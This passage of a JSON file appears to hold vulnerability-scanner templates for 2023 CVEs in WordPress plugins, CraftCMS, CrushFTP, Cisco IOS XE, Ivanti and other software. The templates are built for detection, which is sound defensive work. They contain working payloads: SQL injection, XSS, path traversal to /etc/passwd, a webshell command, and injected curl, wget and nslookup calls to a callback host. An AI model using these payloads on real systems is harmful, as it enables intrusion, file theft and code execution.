md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file</label>","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-43177","info":{"name":"CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebInterface"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains_all(to_lower(header), \"currentauth\", \"crushauth\")"]}]},{"method":"POST","path":["{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"],"headers":{"Cookie":"CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}","as2-to":"X","user_name":"crushadmin{{dirname}}","user_log_path":"./WebInterface/{{dirname}}/","user_log_file":"{{filename}}","Content-Type":"application/x-www-form-urlencoded"},"body":"post=body\n","matchers":[{"type":"regex","regex":["crushadmin"]}]},{"method":"GET","path":["{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"crushadmin{{dirname}}\")"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-45375","info":{"name":"PrestaShop PireosPay - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/modules/pireospay/\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 10\nPOST /module/pireospay/validation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\najax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<itunes:email>\",\"</itunes:email>\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","<title>Wi-Fi APP Login</title>"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\":  \"on_publish\", \"app\":  \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\"?> <SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <SOAP:Header> <wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\"> <wsse:UsernameToken SOAP:mustUnderstand=\"false\"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\"> <execCLI xsd=\"false\"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","<text>","<received>"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["<text>\\n(.*)\\["]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site 